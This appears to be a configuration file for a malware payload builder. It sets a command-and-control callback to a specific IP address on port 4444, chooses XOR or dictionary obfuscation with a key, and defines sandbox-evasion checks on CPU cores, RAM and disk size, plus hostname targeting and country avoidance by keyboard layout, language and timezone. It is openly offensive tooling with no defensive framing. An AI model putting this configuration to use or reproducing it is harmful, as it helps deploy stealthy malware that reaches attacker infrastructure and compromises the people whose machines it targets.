[Payload]
# Remote host and port corresponding to the C2 server to connect back to
lhost="37.114.41.46"
lport=4444

# xor, dictionary (not yet aes/rc4) (XOR SEEMS NO BUENO ANYMORE)
# encryption_method=xor
encryption_method=dictionary

# XOR key, if encryption_method=xor else ignored
# random -> between 0x1111 and 0xffff with good entropy
# encryption_key=random
encryption_key=0x3e4b

[Anti-Analysis]
# If cpu cores is less or equal than <value>, the payload will not be executed
# If not set, check will no be made
cpu_cores=

# If ram size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in MB
ram_size=100
# If disk size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in GB
disk_size=10

# target_hostname has priority over avoid_hostname
# target_hostname=
target_hostname=
# target_hostname=prefix1

# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=

# based on : keyboard layout, language, timezone
# if one match, the payload will not be executed
# avoid_countries=RU,CN
avoid_countries=
